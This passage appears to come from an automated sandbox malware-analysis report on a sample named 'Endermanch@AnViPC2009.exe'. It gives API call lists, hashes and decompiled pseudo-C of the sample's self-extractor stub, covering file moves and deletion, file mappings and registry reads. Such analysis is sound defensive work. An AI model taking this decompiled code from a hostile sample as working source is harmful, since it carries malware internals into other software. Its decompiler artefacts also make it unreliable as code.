                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0040D160
                                                                                                                                                      • SendMessageA.USER32 ref: 0040D16E
                                                                                                                                                      • SendMessageA.USER32 ref: 0040D17D
                                                                                                                                                      • DialogBoxParamA.USER32 ref: 0040D2D7
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040D2E9
                                                                                                                                                        • Part of subcall function 0040BF72: lstrcmpiA.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,0040D289,?,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 0040C00B
                                                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 0040D313
                                                                                                                                                      • SendMessageA.USER32 ref: 0040D350
                                                                                                                                                      • PostMessageA.USER32 ref: 0040D358
                                                                                                                                                      • SendMessageA.USER32 ref: 0040D18F
                                                                                                                                                        • Part of subcall function 004098D0: LoadStringA.USER32 ref: 0040991F
                                                                                                                                                        • Part of subcall function 004098D0: LoadStringA.USER32 ref: 00409931
                                                                                                                                                      • GetCurrentDirectoryA.KERNEL32(00000400,?), ref: 0040D1A1
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040D1AA
                                                                                                                                                      • SetWindowTextA.USER32(?,00419F92), ref: 0040D1CA
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040D370
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$ItemSend$Window$Text$File$ErrorLastwsprintf$CreateCurrentDialogDirectoryLoadMenuStringView$CallbackCloseCommandCountDestroyDispatcherEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamPointsPostRectShellSleepTickUnmapUserWaitlstrcmpi
                                                                                                                                                      • String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$<$@$C:\Users\user\Desktop\Endermanch@AnViPC2009.exe$C:\Users\user\Desktop\Endermanch@AnViPC2009.exe$LICENSEDLG$P#A$RichEdit$STARTDLG$__tmp_rar_sfx_access_check_%u$`'A$winrarsfxmappingfile.tmp$|LA
                                                                                                                                                      • API String ID: 475857596-3733924038
                                                                                                                                                      • Opcode ID: 7f7c909fd5e84e45b110edb60874e849ca1f456bbc3f5cfd10764e9eb3943983
                                                                                                                                                      • Instruction ID: 831237b8f99e569c4bac353761fa719156e54ecd1e64a15b4798033b6d8f8366
                                                                                                                                                      • Opcode Fuzzy Hash: 7f7c909fd5e84e45b110edb60874e849ca1f456bbc3f5cfd10764e9eb3943983
                                                                                                                                                      • Instruction Fuzzy Hash: BC12AF71941209FBDB21AFA09D85EEF3A69EB05304F00803AF605E21D1C7B84D66DB6E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                      			E0040D37F() {
                                                                                                                                                      				char _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v40;
                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                      				char _v68;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				int _t28;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      				void* _t59;
                                                                                                                                                      				struct HINSTANCE__* _t61;
                                                                                                                                                      				void* _t62;
                                                                                                                                                      				CHAR* _t63;
                                                                                                                                                      				void* _t66;
                                                                                                                                                      				intOrPtr _t68;
                                                                                                                                                      				intOrPtr _t72;
                                                                                                                                                      				int _t75;
                                                                                                                                                      				intOrPtr _t76;
                                                                                                                                                      
                                                                                                                                                      				__imp__OleInitialize(0); // executed
                                                                                                                                                      				E0040E4FC(0x41fdc0);
                                                                                                                                                      				_t63 = GetCommandLineA();
                                                                                                                                                      				_t67 = _t63;
                                                                                                                                                      				if(_t63 == 0) {
                                                                                                                                                      					L8:
                                                                                                                                                      					GetModuleFileNameA(0, 0x419ad8, 0x400);
                                                                                                                                                      					SetEnvironmentVariableA("sfxname", 0x419ad8); // executed
                                                                                                                                                      					if(E00406E67() == 0) {
                                                                                                                                                      						__eflags = 0;
                                                                                                                                                      						 *0x4192d8 = 0;
                                                                                                                                                      					} else {
                                                                                                                                                      						GetModuleFileNameW(0, "C:\Users\hardz\Desktop\Endermanch@AnViPC2009.exe", 0x400);
                                                                                                                                                      					}
                                                                                                                                                      					_t61 = GetModuleHandleA(0);
                                                                                                                                                      					 *0x414c78 = _t61; // executed
                                                                                                                                                      					_t18 = LoadIconA(_t61, 0x64); // executed
                                                                                                                                                      					 *0x4192d4 = _t18;
                                                                                                                                                      					 *0x4192d0 = LoadBitmapA( *0x414c78, 0x65); // executed
                                                                                                                                                      					E00411677( &_v12); // executed
                                                                                                                                                      					E004098B9(0, 0x414c88, _t59, 0x419ad8);
                                                                                                                                                      					E0040643B( &_v68);
                                                                                                                                                      					E0040643B( &_v40);
                                                                                                                                                      					_v44 = E0040AC7A(0x64);
                                                                                                                                                      					_v16 = E0040AC7A(0x64);
                                                                                                                                                      					 *0x418ecc =  &_v68;
                                                                                                                                                      					 *0x418ec8 =  &_v40; // executed
                                                                                                                                                      					_t28 = DialogBoxParamA(_t61, "STARTDLG", 0, E0040CC05, 0); // executed
                                                                                                                                                      					 *0x419f80 = 0;
                                                                                                                                                      					 *0x418ec8 = 0;
                                                                                                                                                      					 *0x418ecc = 0;
                                                                                                                                                      					E00406451(E00406451(_t28,  &_v40),  &_v68);
                                                                                                                                                      					_t57 =  &_v12;
                                                                                                                                                      					E004116EF( &_v12);
                                                                                                                                                      					_t72 =  *0x419f88; // 0x0
                                                                                                                                                      					if(_t72 != 0) {
                                                                                                                                                      						E0040B702( &_v12);
                                                                                                                                                      					}
                                                                                                                                                      					E0040A262(_t57, 0x419ee8, 0, 0x80);
                                                                                                                                                      					if( *0x41a824 > 0) {
                                                                                                                                                      						E0040A1DE( *0x41a818);
                                                                                                                                                      					}
                                                                                                                                                      					DeleteObject( *0x4192d4);
                                                                                                                                                      					_t34 =  *0x4192d0; // 0x19050bc3
                                                                                                                                                      					if(_t34 != 0) {
                                                                                                                                                      						DeleteObject(_t34);
                                                                                                                                                      					}
                                                                                                                                                      					_t75 =  *0x414c7c; // 0x0
                                                                                                                                                      					if(_t75 == 0) {
                                                                                                                                                      						_t76 =  *0x419f78; // 0x2
                                                                                                                                                      						if(_t76 != 0) {
                                                                                                                                                      							E0040321D(0x414c7c, 0xff);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					_t35 =  *0x41a828;
                                                                                                                                                      					 *0x419f78 = 2;
                                                                                                                                                      					if( *0x41a828 != 0) {
                                                                                                                                                      						E0040B6C3(_t35); // executed
                                                                                                                                                      					}
                                                                                                                                                      					"0+&u@uxv"(); // executed
                                                                                                                                                      					ExitProcess( *0x414c7c);
                                                                                                                                                      				}
                                                                                                                                                      				E0040B45E(0x41fdc0, _t67, _t63);
                                                                                                                                                      				_t68 =  *0x419f91; // 0x0
                                                                                                                                                      				if(_t68 == 0) {
                                                                                                                                                      					SetEnvironmentVariableA("sfxcmd", _t63); // executed
                                                                                                                                                      					goto L8;
                                                                                                                                                      				}
                                                                                                                                                      				_t62 = OpenFileMappingA(4, 0, "winrarsfxmappingfile.tmp");
                                                                                                                                                      				if(_t62 == 0) {
                                                                                                                                                      					L6:
                                                                                                                                                      					CloseHandle(_t62);
                                                                                                                                                      					goto L8;
                                                                                                                                                      				}
                                                                                                                                                      				_t66 = MapViewOfFile(_t62, 4, 0, 0, 0x10000);
                                                                                                                                                      				if(_t66 != 0) {
                                                                                                                                                      					SetEnvironmentVariableA("sfxcmd", _t66);
                                                                                                                                                      				}
                                                                                                                                                      				UnmapViewOfFile(_t66);
                                                                                                                                                      				goto L6;
                                                                                                                                                      			}




















                                                                                                                                                      0x0040d38b
                                                                                                                                                      0x0040d396
                                                                                                                                                      0x0040d3a1
                                                                                                                                                      0x0040d3a3
                                                                                                                                                      0x0040d3a5
                                                                                                                                                      0x0040d407
                                                                                                                                                      0x0040d414
                                                                                                                                                      0x0040d420
                                                                                                                                                      0x0040d42d
                                                                                                                                                      0x0040d43e
                                                                                                                                                      0x0040d440
                                                                                                                                                      0x0040d42f
                                                                                                                                                      0x0040d436
                                                                                                                                                      0x0040d436
                                                                                                                                                      0x0040d44d
                                                                                                                                                      0x0040d452
                                                                                                                                                      0x0040d458
                                                                                                                                                      0x0040d466
                                                                                                                                                      0x0040d474
                                                                                                                                                      0x0040d479
                                                                                                                                                      0x0040d484
                                                                                                                                                      0x0040d48c
                                                                                                                                                      0x0040d494
                                                                                                                                                      0x0040d4a2
                                                                                                                                                      0x0040d4b0
                                                                                                                                                      0x0040d4b7
                                                                                                                                                      0x0040d4c5
                                                                                                                                                      0x0040d4ca
                                                                                                                                                      0x0040d4d3
                                                                                                                                                      0x0040d4d9
                                                                                                                                                      0x0040d4df
                                                                                                                                                      0x0040d4ed
                                                                                                                                                      0x0040d4f2
                                                                                                                                                      0x0040d4f5
                                                                                                                                                      0x0040d4fa
                                                                                                                                                      0x0040d500
                                                                                                                                                      0x0040d502
                                                                                                                                                      0x0040d502
                                                                                                                                                      0x0040d512
                                                                                                                                                      0x0040d51d
                                                                                                                                                      0x0040d525
                                                                                                                                                      0x0040d525
                                                                                                                                                      0x0040d536
                                                                                                                                                      0x0040d538
                                                                                                                                                      0x0040d53f
                                                                                                                                                      0x0040d542
                                                                                                                                                      0x0040d542
                                                                                                                                                      0x0040d544
                                                                                                                                                      0x0040d54a
                                                                                                                                                      0x0040d54c
                                                                                                                                                      0x0040d552
                                                                                                                                                      0x0040d55e
                                                                                                                                                      0x0040d55e
                                                                                                                                                      0x0040d552
                                                                                                                                                      0x0040d563
                                                                                                                                                      0x0040d568
                                                                                                                                                      0x0040d574
                                                                                                                                                      0x0040d577
                                                                                                                                                      0x0040d577
                                                                                                                                                      0x0040d57c
                                                                                                                                                      0x0040d588
                                                                                                                                                      0x0040d588
                                                                                                                                                      0x0040d3a8
                                                                                                                                                      0x0040d3ad
                                                                                                                                                      0x0040d3b3
                                                                                                                                                      0x0040d401
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d401
                                                                                                                                                      0x0040d3c3
                                                                                                                                                      0x0040d3c7
                                                                                                                                                      0x0040d3f2
                                                                                                                                                      0x0040d3f3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d3f3
                                                                                                                                                      0x0040d3d9
                                                                                                                                                      0x0040d3dd
                                                                                                                                                      0x0040d3e5
                                                                                                                                                      0x0040d3e5
                                                                                                                                                      0x0040d3ec
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040D38B
                                                                                                                                                        • Part of subcall function 0040E4FC: GetCPInfo.KERNEL32(00000000,?,?,00000000,?,?,0040E5B6,?,0040A6C1), ref: 0040E50D
                                                                                                                                                        • Part of subcall function 0040E4FC: IsDBCSLeadByte.KERNEL32(00000000,?,00000000), ref: 0040E521
                                                                                                                                                      • GetCommandLineA.KERNEL32 ref: 0040D39B
                                                                                                                                                      • OpenFileMappingA.KERNEL32 ref: 0040D3BD
                                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00010000), ref: 0040D3D3
                                                                                                                                                      • SetEnvironmentVariableA.KERNEL32(sfxcmd,00000000), ref: 0040D3E5
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D3EC
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040D3F3
                                                                                                                                                      • SetEnvironmentVariableA.KERNELBASE(sfxcmd,00000000,00000000), ref: 0040D401
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,00000400), ref: 0040D414
                                                                                                                                                      • SetEnvironmentVariableA.KERNELBASE(sfxname,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 0040D420
                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,00000400), ref: 0040D436
                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040D447
                                                                                                                                                      • LoadIconA.USER32(00000000,00000064), ref: 0040D458
                                                                                                                                                      • LoadBitmapA.USER32 ref: 0040D46B
                                                                                                                                                      • DialogBoxParamA.USER32 ref: 0040D4CA
                                                                                                                                                      • DeleteObject.GDI32(00419EE8), ref: 0040D536
                                                                                                                                                      • DeleteObject.GDI32(19050BC3), ref: 0040D542
                                                                                                                                                      • OleUninitialize.OLE32(?), ref: 0040D57C
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040D588
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$EnvironmentModuleVariable$DeleteHandleLoadNameObjectView$BitmapByteCloseCommandDialogExitIconInfoInitializeLeadLineMappingOpenParamProcessUninitializeUnmap
                                                                                                                                                      • String ID: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe$C:\Users\user\Desktop\Endermanch@AnViPC2009.exe$STARTDLG$sfxcmd$sfxname$winrarsfxmappingfile.tmp$|LA
                                                                                                                                                      • API String ID: 1839015054-2430002526
                                                                                                                                                      • Opcode ID: 2e5c670fba278d0c7e8237f4ce34c1cb973fa7c2b4334fbc462e8232330a7cec
                                                                                                                                                      • Instruction ID: 75cd27527588883911dfe584df737a193eb5a8eb6cecd2d37243bd6620ac9025
                                                                                                                                                      • Opcode Fuzzy Hash: 2e5c670fba278d0c7e8237f4ce34c1cb973fa7c2b4334fbc462e8232330a7cec
                                                                                                                                                      • Instruction Fuzzy Hash: FB51A470940215BBD710BFB1DD899EE3AA8EB45705B05843BF602F22E1DBB80C55CB6E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 230 40bf72-40bf83 call 401200 233 40bf89-40bfb2 call 40b5ec 230->233 234 40ca3d-40ca3e 230->234 237 40bfb8-40bfb9 233->237 238 40ca3c 233->238 239 40bfba-40bfda 237->239 238->234 240 40bfe1-40bff4 call 40a8fe 239->240 243 40bff6 240->243 244 40bffa-40c013 lstrcmpiA 243->244 245 40c023-40c027 244->245 246 40c015-40c01c 244->246 248 40ca0c-40ca34 call 40b5ec 245->248 249 40c02d-40c030 245->249 246->244 247 40c01e 246->247 247->248 248->239 265 40ca3a-40ca3b 248->265 251 40c037-40c03b 249->251 252 40c2ec-40c2f0 249->252 253 40c2cd-40c2d1 249->253 254 40c23f-40c243 249->254 251->248 255 40c041-40c0c3 GetCurrentDirectoryA call 40a450 call 4076a1 call 40a5bb call 405b6f call 405b9f call 403517 call 405f6f 251->255 252->248 257 40c2f6-40c2fd 252->257 253->248 256 40c2d7-40c2e7 SetWindowTextA 253->256 254->248 258 40c249-40c255 254->258 336 40c0c9 255->336 337 40c22f-40c23a call 405b8c 255->337 256->248 257->248 262 40c303-40c317 257->262 263 40c262-40c266 258->263 264 40c257-40c25d call 40a5bb 258->264 267 40c319 262->267 268 40c31f-40c32a call 40a35d 262->268 270 40c270-40c278 call 40b793 263->270 271 40c268-40c26e 263->271 264->263 265->238 267->268 268->248 284 40c330-40c334 268->284 274 40c27a-40c27c 270->274 271->274 276 40c282-40c28d call 40a35d 274->276 277 40c27e-40c280 274->277 281 40c28f-40c2ac call 40a35d call 40a1fd 276->281 277->281 307 40c2b1-40c2bc call 40a5bb 281->307 308 40c2ae 281->308 288 40c3ea-40c3ec 284->288 289 40c33a-40c33e 284->289 293 40c350-40c358 call 40a450 288->293 294 40c3f2-40c3f4 288->294 289->288 292 40c344-40c34a 289->292 292->248 292->293 302 40c35d-40c36d call 40a3b2 293->302 298 40c400-40c41a RegOpenKeyExA 294->298 299 40c3f6-40c3fa 294->299 303 40c44b-40c452 298->303 304 40c41c-40c445 RegQueryValueExA RegCloseKey 298->304 299->293 299->298 316 40c378-40c3c3 call 40a450 call 40b989 GetDlgItem SetWindowTextA SendMessageA call 40a4c2 302->316 317 40c36f-40c373 302->317 305 40c454-40c46b call 40a35d 303->305 306 40c47e-40c49a call 40a35d * 2 303->306 304->303 305->306 324 40c46d-40c479 call 40a5bb 305->324 306->302 334 40c4a0-40c4ad call 40a5bb 306->334 307->248 326 40c2c2-40c2c8 call 40a1de 307->326 308->307 350 40c3c8-40c3ca 316->350 317->316 322 40c375 317->322 322->316 324->306 326->248 334->248 334->302 338 40c0ce-40c0e4 SetFileAttributesA 336->338 337->248 342 40c194-40c1a0 GetFileAttributesA 338->342 343 40c0ea-40c0f2 call 406e67 338->343 348 40c1a2-40c1b1 DeleteFileA 342->348 349 40c213-40c229 call 405f6f 342->349 343->342 356 40c0f8-40c129 call 4072d9 call 4076a1 call 40a35d 343->356 348->349 353 40c1b3-40c1b7 348->353 349->337 349->338 350->248 354 40c3d0-40c3e5 SendMessageA 350->354 357 40c1bf-40c1df wsprintfA GetFileAttributesA 353->357 354->248 370 40c12b-40c13a call 40a35d 356->370 371 40c13c-40c14c call 407252 356->371 359 40c1e1-40c1f7 MoveFileA 357->359 360 40c1b9-40c1bc 357->360 359->349 362 40c1f9-40c200 call 406e67 359->362 360->357 362->349 368 40c202-40c20d MoveFileExA 362->368 368->349 370->371 376 40c152-40c18e call 40a35d call 40a262 SHFileOperationA 370->376 371->337 371->376 376->342
                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E0040BF72(void* __edx, void* __esi, signed int _a1, struct HWND__* _a4, char _a8, char _a11, signed int _a12) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				char _v9;
                                                                                                                                                      				int _v16;
                                                                                                                                                      				void* _v20;
                                                                                                                                                      				int _v24;
                                                                                                                                                      				struct _SHFILEOPSTRUCTA _v56;
                                                                                                                                                      				char _v568;
                                                                                                                                                      				char _v1080;
                                                                                                                                                      				char _v2103;
                                                                                                                                                      				char _v2104;
                                                                                                                                                      				char _v3127;
                                                                                                                                                      				char _v3128;
                                                                                                                                                      				char _v5176;
                                                                                                                                                      				char _v7223;
                                                                                                                                                      				char _v7224;
                                                                                                                                                      				void* _v8248;
                                                                                                                                                      				char _v9416;
                                                                                                                                                      				char _v12504;
                                                                                                                                                      				void _v13528;
                                                                                                                                                      				char _v16608;
                                                                                                                                                      				char _v17632;
                                                                                                                                                      				char _v21728;
                                                                                                                                                      				char _v25824;
                                                                                                                                                      				char _v29920;
                                                                                                                                                      				void* _v34016;
                                                                                                                                                      				char _v38112;
                                                                                                                                                      				char _v42207;
                                                                                                                                                      				char _v42208;
                                                                                                                                                      				char _v46304;
                                                                                                                                                      				signed int __edi;
                                                                                                                                                      				void* _t235;
                                                                                                                                                      				char _t240;
                                                                                                                                                      				void* _t316;
                                                                                                                                                      				void* _t323;
                                                                                                                                                      
                                                                                                                                                      				_t316 = __edx;
                                                                                                                                                      				_t235 = E00401200(0xb4dc);
                                                                                                                                                      				if(_a8 == 0) {
                                                                                                                                                      					return _t235;
                                                                                                                                                      				}
                                                                                                                                                      				_t240 = E0040B5EC(0x1000, __esi, _a8,  &_v21728,  &_v7224,  &_v9,  &_a11); // executed
                                                                                                                                                      				_a8 = _t240;
                                                                                                                                                      				if(_t240 == 0) {
                                                                                                                                                      					return _t240;
                                                                                                                                                      				} else {
                                                                                                                                                      					_push(__esi);
                                                                                                                                                      					goto L3;
                                                                                                                                                      					L6:
                                                                                                                                                      					while(lstrcmpiA( &_v21728,  *(0x4140b8 + _v8 * 4)) != 0) {
                                                                                                                                                      						_v8 = _v8 + 1;
                                                                                                                                                      						if(_v8 < 0xd) {
                                                                                                                                                      							continue;
                                                                                                                                                      						} else {
                                                                                                                                                      							L155:
                                                                                                                                                      							_t240 = E0040B5EC(0x1000, _t323);
                                                                                                                                                      							_a8 = _t240;
                                                                                                                                                      							asm("ror byte [edi], 0x85");
                                                                                                                                                      							[far dword [esi+0x5b](_a8,  &_v21728,  &_v7224,  &_v9,  &_a11);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					if(_v8 > 0xc) {
                                                                                                                                                      						goto L155;
                                                                                                                                                      					}
                                                                                                                                                      					switch( *((intOrPtr*)(_v8 * 4 +  &M0040CA42))) {
                                                                                                                                                      						case 0:
                                                                                                                                                      							__eflags = _a12 - 2;
                                                                                                                                                      							if(_a12 != 2) {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							GetCurrentDirectoryA(0x400,  &_v1080);
                                                                                                                                                      							E0040A450( &_v3128,  &_v1080);
                                                                                                                                                      							E004076A1( &_v3128);
                                                                                                                                                      							E0040A5BB( &_v3128,  &_v7224);
                                                                                                                                                      							E00405B6F( &_v16608);
                                                                                                                                                      							E00405B9F( &_v16608,  &_v3128);
                                                                                                                                                      							E00403517( &_v12504);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_t315 =  &_v16608;
                                                                                                                                                      							_t265 = E00405F6F( &_v16608, _t316,  &_v12504);
                                                                                                                                                      							__eflags = _t265;
                                                                                                                                                      							if(_t265 == 0) {
                                                                                                                                                      								L29:
                                                                                                                                                      								E00405B8C( &_v16608);
                                                                                                                                                      								goto L155;
                                                                                                                                                      							} else {
                                                                                                                                                      								_t309 = "%s.%d.tmp";
                                                                                                                                                      								do {
                                                                                                                                                      									SetFileAttributesA( &_v12504, 0);
                                                                                                                                                      									__eflags = _v9416;
                                                                                                                                                      									if(_v9416 == 0) {
                                                                                                                                                      										L20:
                                                                                                                                                      										_t270 = GetFileAttributesA( &_v12504);
                                                                                                                                                      										__eflags = _t270 - 0xffffffff;
                                                                                                                                                      										if(_t270 == 0xffffffff) {
                                                                                                                                                      											goto L28;
                                                                                                                                                      										}
                                                                                                                                                      										_t274 = DeleteFileA( &_v12504);
                                                                                                                                                      										__eflags = _t274;
                                                                                                                                                      										if(_t274 != 0) {
                                                                                                                                                      											goto L28;
                                                                                                                                                      										} else {
                                                                                                                                                      											_v8 = _v8 & _t274;
                                                                                                                                                      											_push(_t274);
                                                                                                                                                      											goto L24;
                                                                                                                                                      											L24:
                                                                                                                                                      											wsprintfA( &_v2104, _t309,  &_v12504);
                                                                                                                                                      											_t326 = _t326 + 0x10;
                                                                                                                                                      											_t279 = GetFileAttributesA( &_v2104);
                                                                                                                                                      											__eflags = _t279 - 0xffffffff;
                                                                                                                                                      											if(_t279 != 0xffffffff) {
                                                                                                                                                      												_t66 =  &_v8;
                                                                                                                                                      												 *_t66 = _v8 + 1;
                                                                                                                                                      												__eflags =  *_t66;
                                                                                                                                                      												_push(_v8);
                                                                                                                                                      												goto L24;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t282 = MoveFileA( &_v12504,  &_v2104);
                                                                                                                                                      												__eflags = _t282;
                                                                                                                                                      												if(_t282 != 0) {
                                                                                                                                                      													_t283 = E00406E67();
                                                                                                                                                      													__eflags = _t283;
                                                                                                                                                      													if(_t283 != 0) {
                                                                                                                                                      														MoveFileExA( &_v2104, 0, 4);
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      												goto L28;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = E00406E67() - 4;
                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                      										goto L20;
                                                                                                                                                      									}
                                                                                                                                                      									E004072D9(_t315, __eflags,  &_v1080,  &_v8248);
                                                                                                                                                      									E004076A1( &_v8248);
                                                                                                                                                      									_t293 = E0040A35D(_t315,  &_v1080);
                                                                                                                                                      									_v16 = _t293;
                                                                                                                                                      									__eflags = _t293 - 4;
                                                                                                                                                      									if(_t293 < 4) {
                                                                                                                                                      										L18:
                                                                                                                                                      										_t295 = E00407252(_t315,  &_v7224, 0);
                                                                                                                                                      										__eflags = _t295;
                                                                                                                                                      										if(_t295 != 0) {
                                                                                                                                                      											goto L29;
                                                                                                                                                      										}
                                                                                                                                                      										L19:
                                                                                                                                                      										 *((char*)(_t325 + E0040A35D(_t315,  &_v12504) - 0x30d3)) = 0;
                                                                                                                                                      										E0040A262(_t315,  &_v56, 0, 0x1e);
                                                                                                                                                      										_push(0x14);
                                                                                                                                                      										_pop(_t300);
                                                                                                                                                      										_v56.fFlags = _t300;
                                                                                                                                                      										_v56.pFrom =  &_v12504;
                                                                                                                                                      										_v56.wFunc = 3;
                                                                                                                                                      										SHFileOperationA( &_v56);
                                                                                                                                                      										goto L20;
                                                                                                                                                      									}
                                                                                                                                                      									_t305 = E0040A35D(_t315,  &_v8248);
                                                                                                                                                      									__eflags = _v16 - _t305;
                                                                                                                                                      									if(_v16 > _t305) {
                                                                                                                                                      										goto L19;
                                                                                                                                                      									}
                                                                                                                                                      									goto L18;
                                                                                                                                                      									L28:
                                                                                                                                                      									_push(0);
                                                                                                                                                      									_t315 =  &_v16608;
                                                                                                                                                      									_t272 = E00405F6F( &_v16608, _t316,  &_v12504);
                                                                                                                                                      									__eflags = _t272;
                                                                                                                                                      								} while (_t272 != 0);
                                                                                                                                                      								goto L29;
                                                                                                                                                      							}
                                                                                                                                                      						case 1:
                                                                                                                                                      							__eflags = _a12;
                                                                                                                                                      							if(_a12 == 0) {
                                                                                                                                                      								__eax =  *0x41a81c;
                                                                                                                                                      								__eflags =  *0x41a81c;
                                                                                                                                                      								__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                      								__eflags = __bl;
                                                                                                                                                      								if(__bl == 0) {
                                                                                                                                                      									__eax = E0040A5BB(__eax, "<br>");
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _v9;
                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                      									__esi =  &_a8;
                                                                                                                                                      									__edi = E0040B793( &_a8, __eflags);
                                                                                                                                                      								} else {
                                                                                                                                                      									__edi =  &_v7224;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = __bl;
                                                                                                                                                      								if(__bl == 0) {
                                                                                                                                                      									__esi = E0040A35D(__ecx,  *0x41a81c);
                                                                                                                                                      								} else {
                                                                                                                                                      									__esi = 0;
                                                                                                                                                      								}
                                                                                                                                                      								E0040A35D(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                      								__eax = E0040A1FD( *0x41a81c, __eax);
                                                                                                                                                      								 *0x41a81c = __eax;
                                                                                                                                                      								__eflags = __bl;
                                                                                                                                                      								if(__bl != 0) {
                                                                                                                                                      									 *__eax = 0;
                                                                                                                                                      								}
                                                                                                                                                      								__eax = E0040A5BB(__eax, __edi);
                                                                                                                                                      								__eflags = _v9;
                                                                                                                                                      								if(_v9 == 0) {
                                                                                                                                                      									__eax = E0040A1DE(__edi);
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							goto L155;
                                                                                                                                                      						case 2:
                                                                                                                                                      							__eflags = _a12;
                                                                                                                                                      							if(_a12 == 0) {
                                                                                                                                                      								 &_v7224 = SetWindowTextA(_a4,  &_v7224); // executed
                                                                                                                                                      							}
                                                                                                                                                      							goto L155;
                                                                                                                                                      						case 3:
                                                                                                                                                      							__eflags = _a12;
                                                                                                                                                      							if(_a12 != 0) {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *0x419f92;
                                                                                                                                                      							if( *0x419f92 != 0) {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _v7224 - 0x22;
                                                                                                                                                      							__esi =  &_v7224;
                                                                                                                                                      							_v1080 = 0;
                                                                                                                                                      							if(_v7224 == 0x22) {
                                                                                                                                                      								__esi =  &_v7223;
                                                                                                                                                      							}
                                                                                                                                                      							__eax = E0040A35D(__ecx, __esi);
                                                                                                                                                      							__eflags = __eax - 0x400;
                                                                                                                                                      							if(__eax >= 0x400) {
                                                                                                                                                      								goto L155;
                                                                                                                                                      							} else {
                                                                                                                                                      								__al = __esi->i;
